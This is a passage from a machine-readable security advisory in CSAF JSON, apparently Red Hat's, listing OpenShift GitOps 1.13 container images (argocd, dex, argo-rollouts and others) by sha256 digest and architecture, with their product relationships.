"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:25424a9311ba9557e8d07bb199a3bf4a341c5d86be36417728687b417c52cfbf_s390x",
"product": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:25424a9311ba9557e8d07bb199a3bf4a341c5d86be36417728687b417c52cfbf_s390x",
"product_id": "openshift-gitops-1/gitops-rhel8-operator@sha256:25424a9311ba9557e8d07bb199a3bf4a341c5d86be36417728687b417c52cfbf_s390x",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8-operator@sha256:25424a9311ba9557e8d07bb199a3bf4a341c5d86be36417728687b417c52cfbf?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator\u0026tag=v1.13.1-6"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-gitops-1/argocd-rhel8@sha256:65bcc82d88275ce84eb21c2a88a6f4d32bbb8c5e28d34e7de4ee19cc3dddedac_amd64",
"product": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:65bcc82d88275ce84eb21c2a88a6f4d32bbb8c5e28d34e7de4ee19cc3dddedac_amd64",
"product_id": "openshift-gitops-1/argocd-rhel8@sha256:65bcc82d88275ce84eb21c2a88a6f4d32bbb8c5e28d34e7de4ee19cc3dddedac_amd64",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel8@sha256:65bcc82d88275ce84eb21c2a88a6f4d32bbb8c5e28d34e7de4ee19cc3dddedac?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/argocd-rhel8\u0026tag=v1.13.1-6"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/argocd-rhel9@sha256:3cfd0ec979b85445f44648d03118591e3c87f6502a33e27812955151151a9654_amd64",
"product": {
"name": "openshift-gitops-1/argocd-rhel9@sha256:3cfd0ec979b85445f44648d03118591e3c87f6502a33e27812955151151a9654_amd64",
"product_id": "openshift-gitops-1/argocd-rhel9@sha256:3cfd0ec979b85445f44648d03118591e3c87f6502a33e27812955151151a9654_amd64",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel9@sha256:3cfd0ec979b85445f44648d03118591e3c87f6502a33e27812955151151a9654?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/argocd-rhel9\u0026tag=v1.13.1-1"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:19f678df553293e30b56f28ed32e90f72648649a5d5b89c4be59dcf912c6e9fa_amd64",
"product": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:19f678df553293e30b56f28ed32e90f72648649a5d5b89c4be59dcf912c6e9fa_amd64",
"product_id": "openshift-gitops-1/argo-rollouts-rhel8@sha256:19f678df553293e30b56f28ed32e90f72648649a5d5b89c4be59dcf912c6e9fa_amd64",
"product_identification_helper": {
"purl": "pkg:oci/argo-rollouts-rhel8@sha256:19f678df553293e30b56f28ed32e90f72648649a5d5b89c4be59dcf912c6e9fa?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8\u0026tag=v1.13.1-6"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:a8399eae8d0e6810a1a340bb80df08ae49ff1c0eff4eea39c8c929ef5a5d6e37_amd64",
"product": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:a8399eae8d0e6810a1a340bb80df08ae49ff1c0eff4eea39c8c929ef5a5d6e37_amd64",
"product_id": "openshift-gitops-1/console-plugin-rhel8@sha256:a8399eae8d0e6810a1a340bb80df08ae49ff1c0eff4eea39c8c929ef5a5d6e37_amd64",
"product_identification_helper": {
"purl": "pkg:oci/console-plugin-rhel8@sha256:a8399eae8d0e6810a1a340bb80df08ae49ff1c0eff4eea39c8c929ef5a5d6e37?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/console-plugin-rhel8\u0026tag=v1.13.1-6"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8@sha256:e36a69825f19867f5f455816f9aca377ae0572f32729ab035b66adce8bcef70c_amd64",
"product": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:e36a69825f19867f5f455816f9aca377ae0572f32729ab035b66adce8bcef70c_amd64",
"product_id": "openshift-gitops-1/gitops-rhel8@sha256:e36a69825f19867f5f455816f9aca377ae0572f32729ab035b66adce8bcef70c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8@sha256:e36a69825f19867f5f455816f9aca377ae0572f32729ab035b66adce8bcef70c?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8\u0026tag=v1.13.1-6"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/dex-rhel8@sha256:983356f0dbd9205281f335f3eb3fe2b6d9a82559d0329f622e3d309974fd7ef2_amd64",
"product": {
"name": "openshift-gitops-1/dex-rhel8@sha256:983356f0dbd9205281f335f3eb3fe2b6d9a82559d0329f622e3d309974fd7ef2_amd64",
"product_id": "openshift-gitops-1/dex-rhel8@sha256:983356f0dbd9205281f335f3eb3fe2b6d9a82559d0329f622e3d309974fd7ef2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/dex-rhel8@sha256:983356f0dbd9205281f335f3eb3fe2b6d9a82559d0329f622e3d309974fd7ef2?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/dex-rhel8\u0026tag=v1.13.1-6"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:0c8ce44b0860558edb8e8cc27e9c54b92b34b6b3517f4f357455085eb3d9d30d_amd64",
"product": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:0c8ce44b0860558edb8e8cc27e9c54b92b34b6b3517f4f357455085eb3d9d30d_amd64",
"product_id": "openshift-gitops-1/kam-delivery-rhel8@sha256:0c8ce44b0860558edb8e8cc27e9c54b92b34b6b3517f4f357455085eb3d9d30d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kam-delivery-rhel8@sha256:0c8ce44b0860558edb8e8cc27e9c54b92b34b6b3517f4f357455085eb3d9d30d?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/kam-delivery-rhel8\u0026tag=v1.13.1-6"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/must-gather-rhel8@sha256:a20821b1e70daa6d6c89d477584ef65ec421eb0e76a9fca6d00e74d2bed620ef_amd64",
"product": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:a20821b1e70daa6d6c89d477584ef65ec421eb0e76a9fca6d00e74d2bed620ef_amd64",
"product_id": "openshift-gitops-1/must-gather-rhel8@sha256:a20821b1e70daa6d6c89d477584ef65ec421eb0e76a9fca6d00e74d2bed620ef_amd64",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel8@sha256:a20821b1e70daa6d6c89d477584ef65ec421eb0e76a9fca6d00e74d2bed620ef?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/must-gather-rhel8\u0026tag=v1.13.1-6"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-operator-bundle@sha256:b19fb714784fa74033214d26a368ec13b26452772c0c0384c569c266392234bd_amd64",
"product": {
"name": "openshift-gitops-1/gitops-operator-bundle@sha256:b19fb714784fa74033214d26a368ec13b26452772c0c0384c569c266392234bd_amd64",
"product_id": "openshift-gitops-1/gitops-operator-bundle@sha256:b19fb714784fa74033214d26a368ec13b26452772c0c0384c569c266392234bd_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-operator-bundle@sha256:b19fb714784fa74033214d26a368ec13b26452772c0c0384c569c266392234bd?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-operator-bundle\u0026tag=v1.13.1-6"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:738ad84244e4845d985d3f211f3bdc887b89ca562d54909042813c2291345ce2_amd64",
"product": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:738ad84244e4845d985d3f211f3bdc887b89ca562d54909042813c2291345ce2_amd64",
"product_id": "openshift-gitops-1/gitops-rhel8-operator@sha256:738ad84244e4845d985d3f211f3bdc887b89ca562d54909042813c2291345ce2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8-operator@sha256:738ad84244e4845d985d3f211f3bdc887b89ca562d54909042813c2291345ce2?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator\u0026tag=v1.13.1-6"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-gitops-1/argocd-rhel8@sha256:8814381fb164cc04ff0764a45c4ab36bbf95c64950c6667e78ba3b7dbef85a57_arm64",
"product": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:8814381fb164cc04ff0764a45c4ab36bbf95c64950c6667e78ba3b7dbef85a57_arm64",
"product_id": "openshift-gitops-1/argocd-rhel8@sha256:8814381fb164cc04ff0764a45c4ab36bbf95c64950c6667e78ba3b7dbef85a57_arm64",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel8@sha256:8814381fb164cc04ff0764a45c4ab36bbf95c64950c6667e78ba3b7dbef85a57?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/argocd-rhel8\u0026tag=v1.13.1-6"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/argocd-rhel9@sha256:47bf94148d5c374326ebf24e0a5e5a2eefd57f8cd55611e1b9bca787d5690992_arm64",
"product": {
"name": "openshift-gitops-1/argocd-rhel9@sha256:47bf94148d5c374326ebf24e0a5e5a2eefd57f8cd55611e1b9bca787d5690992_arm64",
"product_id": "openshift-gitops-1/argocd-rhel9@sha256:47bf94148d5c374326ebf24e0a5e5a2eefd57f8cd55611e1b9bca787d5690992_arm64",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel9@sha256:47bf94148d5c374326ebf24e0a5e5a2eefd57f8cd55611e1b9bca787d5690992?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/argocd-rhel9\u0026tag=v1.13.1-1"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:204979b5d35350c0f055d9203a6ba2260b3240a5ecee5f9bb43f5468076a69f3_arm64",
"product": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:204979b5d35350c0f055d9203a6ba2260b3240a5ecee5f9bb43f5468076a69f3_arm64",
"product_id": "openshift-gitops-1/argo-rollouts-rhel8@sha256:204979b5d35350c0f055d9203a6ba2260b3240a5ecee5f9bb43f5468076a69f3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/argo-rollouts-rhel8@sha256:204979b5d35350c0f055d9203a6ba2260b3240a5ecee5f9bb43f5468076a69f3?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8\u0026tag=v1.13.1-6"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:01159dc5aad803a0812003320a9cca4b23a34e8b1d037dbe5437b064a41a5a33_arm64",
"product": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:01159dc5aad803a0812003320a9cca4b23a34e8b1d037dbe5437b064a41a5a33_arm64",
"product_id": "openshift-gitops-1/console-plugin-rhel8@sha256:01159dc5aad803a0812003320a9cca4b23a34e8b1d037dbe5437b064a41a5a33_arm64",
"product_identification_helper": {
"purl": "pkg:oci/console-plugin-rhel8@sha256:01159dc5aad803a0812003320a9cca4b23a34e8b1d037dbe5437b064a41a5a33?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/console-plugin-rhel8\u0026tag=v1.13.1-6"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8@sha256:bda876b4b557ab3e1a0a9d422d784eeb8bd830cb988932eb9b0f6388631ad738_arm64",
"product": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:bda876b4b557ab3e1a0a9d422d784eeb8bd830cb988932eb9b0f6388631ad738_arm64",
"product_id": "openshift-gitops-1/gitops-rhel8@sha256:bda876b4b557ab3e1a0a9d422d784eeb8bd830cb988932eb9b0f6388631ad738_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8@sha256:bda876b4b557ab3e1a0a9d422d784eeb8bd830cb988932eb9b0f6388631ad738?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8\u0026tag=v1.13.1-6"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/dex-rhel8@sha256:63625a8587f9836d55817fbefce372cf294ce5ed3c7d0c4ca1738762aef0b892_arm64",
"product": {
"name": "openshift-gitops-1/dex-rhel8@sha256:63625a8587f9836d55817fbefce372cf294ce5ed3c7d0c4ca1738762aef0b892_arm64",
"product_id": "openshift-gitops-1/dex-rhel8@sha256:63625a8587f9836d55817fbefce372cf294ce5ed3c7d0c4ca1738762aef0b892_arm64",
"product_identification_helper": {
"purl": "pkg:oci/dex-rhel8@sha256:63625a8587f9836d55817fbefce372cf294ce5ed3c7d0c4ca1738762aef0b892?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/dex-rhel8\u0026tag=v1.13.1-6"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:731ef52b2be3f011a77d153740e3eac09f84e5098f7fbf78584c399d498a9f8d_arm64",
"product": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:731ef52b2be3f011a77d153740e3eac09f84e5098f7fbf78584c399d498a9f8d_arm64",
"product_id": "openshift-gitops-1/kam-delivery-rhel8@sha256:731ef52b2be3f011a77d153740e3eac09f84e5098f7fbf78584c399d498a9f8d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kam-delivery-rhel8@sha256:731ef52b2be3f011a77d153740e3eac09f84e5098f7fbf78584c399d498a9f8d?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/kam-delivery-rhel8\u0026tag=v1.13.1-6"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/must-gather-rhel8@sha256:bfb27b8b743b72b93a8e92db93a11a589ee17cdef2d94bdfeeda4c79a20862c4_arm64",
"product": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:bfb27b8b743b72b93a8e92db93a11a589ee17cdef2d94bdfeeda4c79a20862c4_arm64",
"product_id": "openshift-gitops-1/must-gather-rhel8@sha256:bfb27b8b743b72b93a8e92db93a11a589ee17cdef2d94bdfeeda4c79a20862c4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel8@sha256:bfb27b8b743b72b93a8e92db93a11a589ee17cdef2d94bdfeeda4c79a20862c4?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/must-gather-rhel8\u0026tag=v1.13.1-6"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:26796accb8e20fc14ea607742a828818cfad7d32a390f71c6cd9ea8e20079f85_arm64",
"product": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:26796accb8e20fc14ea607742a828818cfad7d32a390f71c6cd9ea8e20079f85_arm64",
"product_id": "openshift-gitops-1/gitops-rhel8-operator@sha256:26796accb8e20fc14ea607742a828818cfad7d32a390f71c6cd9ea8e20079f85_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8-operator@sha256:26796accb8e20fc14ea607742a828818cfad7d32a390f71c6cd9ea8e20079f85?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator\u0026tag=v1.13.1-6"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-gitops-1/argocd-rhel8@sha256:343c542d45bf52fda4742183d60422d36c15615105f990a180fee0b15dcd82d0_ppc64le",
"product": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:343c542d45bf52fda4742183d60422d36c15615105f990a180fee0b15dcd82d0_ppc64le",
"product_id": "openshift-gitops-1/argocd-rhel8@sha256:343c542d45bf52fda4742183d60422d36c15615105f990a180fee0b15dcd82d0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel8@sha256:343c542d45bf52fda4742183d60422d36c15615105f990a180fee0b15dcd82d0?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/argocd-rhel8\u0026tag=v1.13.1-6"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:1597d12f5d487572ecd9afe88e512e1f620599a6a47312cdb0e5ea6fcc4c9b36_ppc64le",
"product": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:1597d12f5d487572ecd9afe88e512e1f620599a6a47312cdb0e5ea6fcc4c9b36_ppc64le",
"product_id": "openshift-gitops-1/argo-rollouts-rhel8@sha256:1597d12f5d487572ecd9afe88e512e1f620599a6a47312cdb0e5ea6fcc4c9b36_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/argo-rollouts-rhel8@sha256:1597d12f5d487572ecd9afe88e512e1f620599a6a47312cdb0e5ea6fcc4c9b36?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8\u0026tag=v1.13.1-6"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:5e2c4a47afa8f147b140abac309cdb1f6c92186170a0180f76acff3526557fde_ppc64le",
"product": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:5e2c4a47afa8f147b140abac309cdb1f6c92186170a0180f76acff3526557fde_ppc64le",
"product_id": "openshift-gitops-1/console-plugin-rhel8@sha256:5e2c4a47afa8f147b140abac309cdb1f6c92186170a0180f76acff3526557fde_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/console-plugin-rhel8@sha256:5e2c4a47afa8f147b140abac309cdb1f6c92186170a0180f76acff3526557fde?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/console-plugin-rhel8\u0026tag=v1.13.1-6"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8@sha256:ba0877e9ea66210a3a47d33369919e425b3e39879832d0425971af56b04da716_ppc64le",
"product": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:ba0877e9ea66210a3a47d33369919e425b3e39879832d0425971af56b04da716_ppc64le",
"product_id": "openshift-gitops-1/gitops-rhel8@sha256:ba0877e9ea66210a3a47d33369919e425b3e39879832d0425971af56b04da716_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8@sha256:ba0877e9ea66210a3a47d33369919e425b3e39879832d0425971af56b04da716?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8\u0026tag=v1.13.1-6"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/dex-rhel8@sha256:94a08e73f086c275689d3b0da814f7cda6f011a991db0aa1312d3f025d866924_ppc64le",
"product": {
"name": "openshift-gitops-1/dex-rhel8@sha256:94a08e73f086c275689d3b0da814f7cda6f011a991db0aa1312d3f025d866924_ppc64le",
"product_id": "openshift-gitops-1/dex-rhel8@sha256:94a08e73f086c275689d3b0da814f7cda6f011a991db0aa1312d3f025d866924_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/dex-rhel8@sha256:94a08e73f086c275689d3b0da814f7cda6f011a991db0aa1312d3f025d866924?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/dex-rhel8\u0026tag=v1.13.1-6"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:ca6139f39423508388f5f8493430113e343e41b4215560b48d7ccb088ab05f1a_ppc64le",
"product": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:ca6139f39423508388f5f8493430113e343e41b4215560b48d7ccb088ab05f1a_ppc64le",
"product_id": "openshift-gitops-1/kam-delivery-rhel8@sha256:ca6139f39423508388f5f8493430113e343e41b4215560b48d7ccb088ab05f1a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kam-delivery-rhel8@sha256:ca6139f39423508388f5f8493430113e343e41b4215560b48d7ccb088ab05f1a?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/kam-delivery-rhel8\u0026tag=v1.13.1-6"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/must-gather-rhel8@sha256:5444ffeeeac5446b3212b06d99256e736048e876125fc65753ce6de9017c25fd_ppc64le",
"product": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:5444ffeeeac5446b3212b06d99256e736048e876125fc65753ce6de9017c25fd_ppc64le",
"product_id": "openshift-gitops-1/must-gather-rhel8@sha256:5444ffeeeac5446b3212b06d99256e736048e876125fc65753ce6de9017c25fd_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel8@sha256:5444ffeeeac5446b3212b06d99256e736048e876125fc65753ce6de9017c25fd?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/must-gather-rhel8\u0026tag=v1.13.1-6"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:f010f82179b4081c06c367227211252b1cdcf664b90da44a0cba15e0000f110a_ppc64le",
"product": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:f010f82179b4081c06c367227211252b1cdcf664b90da44a0cba15e0000f110a_ppc64le",
"product_id": "openshift-gitops-1/gitops-rhel8-operator@sha256:f010f82179b4081c06c367227211252b1cdcf664b90da44a0cba15e0000f110a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8-operator@sha256:f010f82179b4081c06c367227211252b1cdcf664b90da44a0cba15e0000f110a?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator\u0026tag=v1.13.1-6"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:1597d12f5d487572ecd9afe88e512e1f620599a6a47312cdb0e5ea6fcc4c9b36_ppc64le as a component of Red Hat OpenShift GitOps 1.13",
"product_id": "8Base-GitOps-1.13:openshift-gitops-1/argo-rollouts-rhel8@sha256:1597d12f5d487572ecd9afe88e512e1f620599a6a47312cdb0e5ea6fcc4c9b36_ppc64le"
},
"product_reference": "openshift-gitops-1/argo-rollouts-rhel8@sha256:1597d12f5d487572ecd9afe88e512e1f620599a6a47312cdb0e5ea6fcc4c9b36_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:19f678df553293e30b56f28ed32e90f72648649a5d5b89c4be59dcf912c6e9fa_amd64 as a component of Red Hat OpenShift GitOps 1.13",
"product_id": "8Base-GitOps-1.13:openshift-gitops-1/argo-rollouts-rhel8@sha256:19f678df553293e30b56f28ed32e90f72648649a5d5b89c4be59dcf912c6e9fa_amd64"
},
"product_reference": "openshift-gitops-1/argo-rollouts-rhel8@sha256:19f678df553293e30b56f28ed32e90f72648649a5d5b89c4be59dcf912c6e9fa_amd64",
"relates_to_product_reference": "8Base-GitOps-1.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:204979b5d35350c0f055d9203a6ba2260b3240a5ecee5f9bb43f5468076a69f3_arm64 as a component of Red Hat OpenShift GitOps 1.13",
"product_id": "8Base-GitOps-1.13:openshift-gitops-1/argo-rollouts-rhel8@sha256:204979b5d35350c0f055d9203a6ba2260b3240a5ecee5f9bb43f5468076a69f3_arm64"
},
"product_reference": "openshift-gitops-1/argo-rollouts-rhel8@sha256:204979b5d35350c0f055d9203a6ba2260b3240a5ecee5f9bb43f5468076a69f3_arm64",
"relates_to_product_reference": "8Base-GitOps-1.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:7a90a484902bfc7148217914cd65f0a1d7e79218a238abc479a6d9ccef96f4cf_s390x as a component of Red Hat OpenShift GitOps 1.13",
"product_id": "8Base-GitOps-1.13:openshift-gitops-1/argo-rollouts-rhel8@sha256:7a90a484902bfc7148217914cd65f0a1d7e79218a238abc479a6d9ccef96f4cf_s390x"
},
"product_reference": "openshift-gitops-1/argo-rollouts-rhel8@sha256:7a90a484902bfc7148217914cd65f0a1d7e79218a238abc479a6d9ccef96f4cf_s390x",
"relates_to_product_reference": "8Base-GitOps-1.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:343c542d45bf52fda4742183d60422d36c15615105f990a180fee0b15dcd82d0_ppc64le as a component of Red Hat OpenShift GitOps 1.13",
"product_id": "8Base-GitOps-1.13:openshift-gitops-1/argocd-rhel8@sha256:343c542d45bf52fda4742183d60422d36c15615105f990a180fee0b15dcd82d0_ppc64le"
},
"product_reference": "openshift-gitops-1/argocd-rhel8@sha256:343c542d45bf52fda4742183d60422d36c15615105f990a180fee0b15dcd82d0_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:65bcc82d88275ce84eb21c2a88a6f4d32bbb8c5e28d34e7de4ee19cc3dddedac_amd64 as a component of Red Hat OpenShift GitOps 1.13",
"product_id": "8Base-GitOps-1.13:openshift-gitops-1/argocd-rhel8@sha256:65bcc82d88275ce84eb21c2a88a6f4d32bbb8c5e28d34e7de4ee19cc3dddedac_amd64"
},
"product_reference": "openshift-gitops-1/argocd-rhel8@sha256:65bcc82d88275ce84eb21c2a88a6f4d32bbb8c5e28d34e7de4ee19cc3dddedac_amd64",
"relates_to_product_reference": "8Base-GitOps-1.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:8738e84b087318aa8b9a3d2fa851e018897af0b646de58cde3be0861c3a2b3fd_s390x as a component of Red Hat OpenShift GitOps 1.13",
"product_id": "8Base-GitOps-1.13:openshift-gitops-1/argocd-rhel8@sha256:8738e84b087318aa8b9a3d2fa851e018897af0b646de58cde3be0861c3a2b3fd_s390x"
},
"product_reference": "openshift-gitops-1/argocd-rhel8@sha256:8738e84b087318aa8b9a3d2fa851e018897af0b646de58cde3be0861c3a2b3fd_s390x",
"relates_to_product_reference": "8Base-GitOps-1.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:8814381fb164cc04ff0764a45c4ab36bbf95c64950c6667e78ba3b7dbef85a57_arm64 as a component of Red Hat OpenShift GitOps 1.13",
"product_id": "8Base-GitOps-1.13:openshift-gitops-1/argocd-rhel8@sha256:8814381fb164cc04ff0764a45c4ab36bbf95c64950c6667e78ba3b7dbef85a57_arm64"
},
"product_reference": "openshift-gitops-1/argocd-rhel8@sha256:8814381fb164cc04ff0764a45c4ab36bbf95c64950c6667e78ba3b7dbef85a57_arm64",
"relates_to_product_reference": "8Base-GitOps-1.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:01159dc5aad803a0812003320a9cca4b23a34e8b1d037dbe5437b064a41a5a33_arm64 as a component of Red Hat OpenShift GitOps 1.13",
"product_id": "8Base-GitOps-1.13:openshift-gitops-1/console-plugin-rhel8@sha256:01159dc5aad803a0812003320a9cca4b23a34e8b1d037dbe5437b064a41a5a33_arm64"
},
"product_reference": "openshift-gitops-1/console-plugin-rhel8@sha256:01159dc5aad803a0812003320a9cca4b23a34e8b1d037dbe5437b064a41a5a33_arm64",
"relates_to_product_reference": "8Base-GitOps-1.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:5e2c4a47afa8f147b140abac309cdb1f6c92186170a0180f76acff3526557fde_ppc64le as a component of Red Hat OpenShift GitOps 1.13",
"product_id": "8Base-GitOps-1.13:openshift-gitops-1/console-plugin-rhel8@sha256:5e2c4a47afa8f147b140abac309cdb1f6c92186170a0180f76acff3526557fde_ppc64le"
},
"product_reference": "openshift-gitops-1/console-plugin-rhel8@sha256:5e2c4a47afa8f147b140abac309cdb1f6c92186170a0180f76acff3526557fde_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:a8399eae8d0e6810a1a340bb80df08ae49ff1c0eff4eea39c8c929ef5a5d6e37_amd64 as a component of Red Hat OpenShift GitOps 1.13",
"product_id": "8Base-GitOps-1.13:openshift-gitops-1/console-plugin-rhel8@sha256:a8399eae8d0e6810a1a340bb80df08ae49ff1c0eff4eea39c8c929ef5a5d6e37_amd64"
},
"product_reference": "openshift-gitops-1/console-plugin-rhel8@sha256:a8399eae8d0e6810a1a340bb80df08ae49ff1c0eff4eea39c8c929ef5a5d6e37_amd64",
"relates_to_product_reference": "8Base-GitOps-1.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:f241386d6775eda56cc4965fc798b3c955c8ad37fbab5c0b9d2a047322df3c8c_s390x as a component of Red Hat OpenShift GitOps 1.13",
"product_id": "8Base-GitOps-1.13:openshift-gitops-1/console-plugin-rhel8@sha256:f241386d6775eda56cc4965fc798b3c955c8ad37fbab5c0b9d2a047322df3c8c_s390x"
},
"product_reference": "openshift-gitops-1/console-plugin-rhel8@sha256:f241386d6775eda56cc4965fc798b3c955c8ad37fbab5c0b9d2a047322df3c8c_s390x",
